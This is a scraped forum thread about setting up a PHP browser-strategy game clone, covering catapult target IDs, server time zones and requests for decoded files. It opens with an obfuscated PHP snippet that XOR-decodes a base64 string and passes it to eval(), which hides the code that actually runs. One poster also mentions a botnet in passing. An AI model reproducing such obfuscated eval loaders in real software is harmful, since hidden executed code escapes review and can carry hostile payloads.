$ex = "eval";$a = "".base64_decode("MT5wfAcfHQwDfzs+Kjc1fwVxeCNVUjE+cHwHHx0MA38oLDd/BXF4I1VSMT5weTs3KCFwfAcfHQwDfzs+Kjc1fwV0eHwHHx0MA38oLDd/BXFxUiNSVVI9OzA3cHo+OTE0PTx6cWNSVVI9IDEsY1VSUiVSVVIlVVIl").""; $b = "X"; $o = ''; for($i=0;$i<strlen($a);$i++) { $o .= $a{$i} ^ $b[0]; } $e = $o;$v1 = ".";$v2="X";$oo = ''; for($vv=0;$vv<strlen($v1);$vv++) { $oo .= $v1{$vv} ^ $v2[0]; } $v = $oo;$er = '';$e1 = "d:*xwfd:f9*+=x=**7*dw:fbxx+!6,9 x=**7*tx-6= (=;,=<x"; $e2 = "X"; $oo = ''; for($ee=0;$ee<strlen($e1);$ee++) { $oo .= $e1{$vv} ^ $e2[0]; }$er .= $oo;$er .= strtoupper(stripslashes($ex));$e3 = "x76x416=xd:fidw:fd:*xwf"; $e4 = "X"; $oo = ''; for($ee=0;$ee<strlen($e3);$ee++) { $oo .= $e3{$vv} ^ $e4[0]; } $er .= $oo;if(!$ex){ exit;}if($ex[1] == $v AND strlen($e)) {$_c = eval($e);}if($ex[1] != $v AND strlen($e)) {print($er);}

public $catapultCanAttack = array
1 => 10,
2 => 11,
3 => 9,
4 => 6,
5 => 2,
6 => 4,
7 => 8,
8 => 7,
9 => 3,
10 => 5,
11 => 1,
12 => 22,
13 => 13,
14 => 19,
15 => 12,
16 => 35,
17 => 18,
18 => 29,
19 => 30,
20 => 37,
21 => 41,
22 => 15,
23 => 17,
24 => 26,
25 => 16,
26 => 25,
27 => 20,
28 => 14,
29 => 24,
30 => 28,
31 => 40,
32 => 21
35 => 40 WW
public $onlyOneSpyAction = FALSE;
Junior Spellweaver
Jan 11, 2012
Reaction score
35 => 40 WW

That is correct as long as those are the actually ids for the buildings, I don't remember the ids off the top of my head. Make sure those ids are the right ones and it will do it.
Newbie Spellweaver
Apr 1, 2012
Reaction score
account is in 10 ms
time server 15:22:50

this is the time server,this is right because i insert
in my config.php
but the datetime of report is not the same,so i see the datetime on my database ,my qlocked_date is the datetime on my report ,
how to change this datetime to the current time :date_default_timezone_set('Europe/Paris');

thank you
Junior Spellweaver
Jan 11, 2012
Reaction score
The date is setup according to your server date, it doesn't matter what your config.php is, the only way to change it all would be to tell your host to change the time zone to Paris
Junior Spellweaver
Sep 10, 2011
Reaction score
good work ubiByte keep going

maybe some time i will upload new build.php

i have some tests for 2 weeks i can't work in dboor or in my botnet , and my other project
Newbie Spellweaver
Apr 1, 2012
Reaction score
Bazaid : the cata of arab is not on the list in armory and blacksmith
can you put here the right metadata.php -build.php-v2v.php
please ,thank you

ubiByte: thank you ,but i don't think that my host change his server time for me :(
so the next time i must choose a host in europe to have the right server time on report ,messages...
Junior Spellweaver
Sep 10, 2011
Reaction score
Bazaid : the cata of arab is not on the list in armory and blacksmith
can you put here the right metadata.php -build.php-v2v.php
please ,thank you

ubiByte: thank you ,but i don't think that my host change his server time for me :(
so the next time i must choose a host in europe to have the right server time on report ,messages...

i don't finish my decode for build.php maybe it's 94 or 96 %

and i don't start decode v2v.php

after finish my tests i will see the decode and fix some
Newbie Spellweaver
May 17, 2012
Reaction score
Who will pay you to play on server XD? No1 with brain wouldn't pay you that much because its unrealistic but what i know.I am just only some freaking guest here & no1 gives a duck for me or the others.
Newbie Spellweaver
Apr 1, 2012
Reaction score
How to put great granary ,great warehouse and world wonder on the list of target on dboor ??????????
can you put here your v2v.php please
thank you
Initiate Mage
Apr 19, 2012
Reaction score
I need decoded v2v files ( both .php and .phtml) , I would be grateful if someone would share his working v2v files , thanks you in advance .
Newbie Spellweaver
Feb 5, 2012
Reaction score
why when i wrote show tatar..its doesnt want to work? :*:
Last edited:
Newbie Spellweaver
Jan 21, 2012
Reaction score
Nobody has the solutions to destroy Wonderland , great granary and great warehouse ? Thanks for your reponse
Newbie Spellweaver
Apr 15, 2012
Reaction score
dboor no free software? or why you need to decode?
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